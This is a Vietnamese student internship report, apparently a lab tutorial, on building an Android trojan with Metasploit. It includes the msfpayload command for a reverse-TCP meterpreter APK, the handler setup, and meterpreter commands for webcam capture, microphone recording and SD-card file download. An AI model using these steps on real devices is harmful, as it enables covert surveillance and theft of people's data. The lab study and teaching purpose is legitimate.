báo cáo tuần 3

16
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ĐỀ TÀI : NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI BÁO CÁO TUẦN 3 GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN THỊ HÀ TIÊN

Upload: ha-tien-nhi

Post on 27-Jun-2015

69 views

Category:

Engineering


0 download

DESCRIPTION

Báo cáo thực tập Athena

TRANSCRIPT

Page 1: Báo cáo tuần 3

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ

ĐỀ TÀI :

NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH

SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA

NGOÀI

BÁO CÁO TUẦN 3

GVHD: VÕ ĐỖ THẮNG

SVTH: NGUYỄN THỊ HÀ TIÊN

Page 2: Báo cáo tuần 3

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

PHẦN 1: THỰC HIỆN TRÊN MẠNG LAN

1.1. Nghiên cứu và cài đặt Kali Linux trên VMware 1.2. Tạo mã độc trên Kali Linux xâm nhập Android

1.2.1. Tạo mã độc trên Kali Linux

Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi

máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử

dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau:

Bấm vào VM Settings... ở thanh lựa chọn của Vmware

Bấm vào Network Adapter và chọn Bridged: connection directly to the

physical network

Trang 1

Page 3: Báo cáo tuần 3

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

Bấm vào Edit -> Virtual Network Editor...

Trên phần Bridge (connect VMs directly to the external network) chọn

adapter của máy thật

Trang 2

Page 4: Báo cáo tuần 3

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android

Đầu tiên mở Terminal và gõ dòng lệnh

Msfpayload android/meterpreter/reverse_tcp lhost=192.168.126.130

lport=8080 R > /root/Desktop/hack.apk

Trang 3

Page 5: Báo cáo tuần 3

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

192.168.126.130 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig

để xem IP của máy Kali

8080 là số port, có thể chọn port khác, không nên chọn các port thường sử

dụng

Lệnh trên sẽ tạo ra 1 file hack.apk trên desktop của Kali, đây chính là một

Metasploit reverse tcp backdoor.

Trang 4

Page 6: Báo cáo tuần 3

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

Tiếp theo, gõ lệnh msfconsole

Sau khi msfconsole load xong, ta tạo một handler để xử lí dữ liệu truyền về

bằng cách gõ lệnh sau:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

Trang 5

Page 7: Báo cáo tuần 3

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

set lhost 192.168.126.130 – nhập địa chỉ IP giống với khi tạo payload ở

trên.

set lport 8080 – nhập port giống với port khi tạo payload ở trên.

Exploit

Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.

Thử với một máy Samsung Galaxy S3 giả lập, tải về hack.apk, cài đặt và

mở lên được giao diện như dưới, nhấp vào nút reverse_tcp

Trang 6

Page 8: Báo cáo tuần 3

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như

sau:

Trang 7

Page 9: Báo cáo tuần 3

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

Để xem thông tin về máy, nhập lệnh SysInfo

1.2.2. Thực hiện khai thác dữ liệu trong SDcard

a. Sử dụng camera

Để xem danh sách camera, nhập webcam_list

Trang 8

Page 10: Báo cáo tuần 3

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

Để chụp hình bằng camera, nhập webcam_snap x với x là ID của camera

xem ở danh sách camera ở phần trước. Ví dụ như sau:

File hình đã chụp từ camera của máy android là GBgAyecQ.jpg được lưu

ở /root của máy

b. Ghi âm

Trang 9

Page 11: Báo cáo tuần 3

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về

máy

c. Lấy file từ SDcard

Để vào SDcard, nhập lệnh cd /sdcard và lệnh ls để xem danh sách file, thư

mục

Trang 10

Page 12: Báo cáo tuần 3

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

Ví dụ ở đây, ta tải file hack-1.apk trong thư mục download của SDcard

Trang 11

Page 13: Báo cáo tuần 3

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

Dùng lệnh cd /sdcard/Download để vào thư mục

Trang 12

Page 14: Báo cáo tuần 3

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

Như trên hình, ta thấy 2 file là hack-1.apk và hack.apk, để tải hack-1.apk

về máy, ta nhập lệnh

Download hack-1.apk

Và file này sẽ được tải về thư mục root của máy Kali

Trang 13

Page 15: Báo cáo tuần 3

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

Trang 14